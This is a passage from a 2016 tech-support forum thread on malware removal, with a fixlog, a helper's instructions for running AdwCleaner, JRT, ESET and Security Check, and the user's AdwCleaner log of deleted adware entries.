"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A18C8BED-9923-4C65-B78D-B7C168B06955}" => key removed successfully
C:\WINDOWS\System32\Tasks\ga1817011518170115 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ga1817011518170115" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9528279-474A-4DBA-B459-B825FF0C055E} => key not found. 
C:\WINDOWS\System32\Tasks\System HealerPeriod => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerPeriod => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AA44AE25-68B3-45C6-B7D1-06333F50237C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA44AE25-68B3-45C6-B7D1-06333F50237C}" => key removed successfully
C:\WINDOWS\System32\Tasks\SMW_P => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_P" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} => key not found. 
C:\WINDOWS\System32\Tasks\AGProxyCheck => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AGProxyCheck => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ADD99CD3-D8CD-40A8-935C-68C869A6BCB2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ADD99CD3-D8CD-40A8-935C-68C869A6BCB2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75}" => key removed successfully
C:\WINDOWS\System32\Tasks\ga7369985773699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ga7369985773699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7270AB1-E0AB-41E2-971C-27831D9730D2} => key not found. 
C:\WINDOWS\System32\Tasks\One System Care Task => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Task => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3BB1E32-5428-4562-8D07-A171B852CB9C} => key not found. 
C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FD468177-984E-4514-B2CE-7B86E83EF36F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD468177-984E-4514-B2CE-7B86E83EF36F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
C:\WINDOWS\Tasks\System HealerPeriod.job => not found.
C:\WINDOWS\Tasks\System HealerStartUp.job => not found.
C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => not found.
C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => not found.
C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk => Shortcut argument removed successfully.
C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk => not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP => moved successfully
C:\ProgramData\Temp => ":972E3A44" ADS removed successfully.
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe" => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CE917A65-979C-4094-9A27-546C03A0F0B4} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}] => value not found.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}] => value not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 1183893 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 79733461 B
Java, Flash, Steam htmlcache => 31886199 B
Windows/system/drivers => 38319541 B
Edge => 118022254 B
Chrome => 100101608 B
Firefox => 18808434 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 194669 B
NetworkService => 51592 B
Robert G => 193568184 B
 
RecycleBin => 23648753414 B
EmptyTemp: => 22.6 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:13:08 ====


#5 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 28 December 2016 - 02:00 PM

Greetings,

Yes, we took a big bite out of things. Don't worry about the 2 programs you didn't find.

Please do these things.

===================================================

Malwarebytes AdwCleaner

-------------------
  • Please download AdwCleaner and save it on your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed if there are threats found you will see Found 3 threats or something similar above the progress bar
  • Click each tab under Results and uncheck any items you want to keep
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Click OK twice to finish the removal process by automatically rebooting your computer
  • Once completed an AdwCleaner document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Malwarebytes Junkware Removal Tool

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Once completed a JRT.txt document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

ESET Online Scanner

--------------------

I'd like us to scan your machine with ESET OnlineScan This process may may take several hours, that is normal.
  • Download esetsmartinstaller_enu.exe and save it to your Desktop
  • Double click the icon
  • Check YES, I accept the Terms of Use
  • Click the Start button
  • Accept any security warnings from your browser
  • Click Advanced settings
  • Check the following items

Enable detection of potentially unwanted applications
Remove found threats
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology

  • Click Start
  • ESET will then download updates and begin scanning your computer
  • If no threats are found simply click Uninstall application on close and hit Finish
  • If threats are found click List of found threats
  • Click Export to text file
  • Save the file on your Desktop as ESET.txt
  • Click Back
  • Review the list of entries and if there are any you want to keep stop and copy/paste the ESET.txt report in your reply for my review
  • If you do not wish to keep any of the entries check Uninstall application on close and Delete quarantined files
  • Click Finish
  • Close the ESET Online Scanner window
  • Copy and paste the contents of ESET.txt in your reply
===================================================

screen317's Security Check

--------------------
  • Please download screen317's Security Check to your desktop
  • Double-click icon to launch the program
  • Click OK
  • Select Run Note: If you receive an error message saying UNSUPPORTED OPERATING SYSTEM! ABORTED! reboot your computer and attempt to run it again
  • Allow the program to run
  • A Notepad document will open on your desktop. Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • AdwCleaner log
  • Junkware log
  • ESET log
  • Security Check log
  • How is your computer running?

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#6 billiam864

billiam864
  • Topic Starter

  • Members
  • 71 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 28 December 2016 - 10:40 PM

I ran the 4 scans as requested. Clearly found plenty of malware. Logs are below.

 

Again I can notice improvement in my cpu's speed. I haven't noticed any continuing issues popup wise. Happy to run additional checks to be thorough, but I appreciate the fast improvement already.

 

 

# AdwCleaner v6.041 - Logfile created 28/12/2016 at 13:18:51
# Updated on 16/12/2016 by Malwarebytes
# Database : 2016-12-26.3 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : Robert G - LENOVOLAPTOP
# Running from : C:\Users\Robert G\Desktop\AdwCleaner.exe
# Mode: Clean
 
 
 
***** [ Services ] *****
 
[-] Service deleted: dofumimy
[-] Service deleted: SMUpd
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\System Healer
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\BandwidthStat
[-] Folder deleted: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Local\Shortcut Installer
 
 
***** [ Files ] *****
 
[-] File deleted: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
[-] Shortcut disinfected: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WindowService
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WindowService
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key deleted: HKU\.DEFAULT\Software\System Healer
[-] Key deleted: HKU\.DEFAULT\Software\BandwidthStat
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\BandwidthStat
[-] Key deleted: HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Interstatnogui
[-] Key deleted: HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\MICROSOFT\wewewe
[#] Key deleted on reboot: HKU\S-1-5-18\Software\System Healer
[#] Key deleted on reboot: HKU\S-1-5-18\Software\BandwidthStat
[#] Key deleted on reboot: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Uninstall\BandwidthStat
[#] Key deleted on reboot: HKCU\Software\Interstatnogui
[#] Key deleted on reboot: HKCU\Software\MICROSOFT\wewewe
[-] Key deleted: HKLM\SOFTWARE\mybeesearch
[-] Key deleted: HKLM\SOFTWARE\SearchModule
[-] Key deleted: HKLM\SOFTWARE\IDOT
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Key deleted on reboot: [x64] HKCU\Software\Interstatnogui
[#] Key deleted on reboot: [x64] HKCU\Software\MICROSOFT\wewewe
[-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule
[-] Key deleted: [x64] HKLM\SOFTWARE\IDOT
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{04015ed4-ea75-40e6-95eb-40c41cca3c54} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{198a094c-b9b6-11e6-8989-806e6f6e6963} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{41d9c6ca-c4d3-4ab9-bc0e-a843a9ce1270} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8a447089-47e9-4d06-9914-cb80e19b8782} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c31e8efe-f610-458b-9262-a9397c5775b0} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{cba8f7e0-c5c0-4237-af70-beb3dc430bd6} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{f63de64d-56e2-4032-a978-5f473c40b621} [NameServer] 
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ff91af18-7468-4914-8197-16431e9a0fa0} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{04015ed4-ea75-40e6-95eb-40c41cca3c54} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{198a094c-b9b6-11e6-8989-806e6f6e6963} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{41d9c6ca-c4d3-4ab9-bc0e-a843a9ce1270} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8a447089-47e9-4d06-9914-cb80e19b8782} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c31e8efe-f610-458b-9262-a9397c5775b0} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{cba8f7e0-c5c0-4237-af70-beb3dc430bd6} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{f63de64d-56e2-4032-a978-5f473c40b621} [NameServer] 
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ff91af18-7468-4914-8197-16431e9a0fa0} [NameServer] 
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coupontime.co
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\govids.net
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nowuseeitplayer.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ui.nowuseeitplayer.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.govids.net
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\bestpriceninja.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\coupontime.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pstatic.bestpriceninja.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\re-markit.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.coupontime00.coupontime.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.re-markit00.re-markit.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www-searching.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bestpriceninja.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\coupontime.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\re-markit.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.re-markit00.re-markit.co
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www-searching.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coupontime.co
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\govids.net
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nowuseeitplayer.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ui.nowuseeitplayer.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.govids.net
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\coupontime.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pstatic.bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\re-markit.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.coupontime00.coupontime.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.re-markit00.re-markit.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www-searching.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\coupontime.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pstatic.bestpriceninja.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\re-markit.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
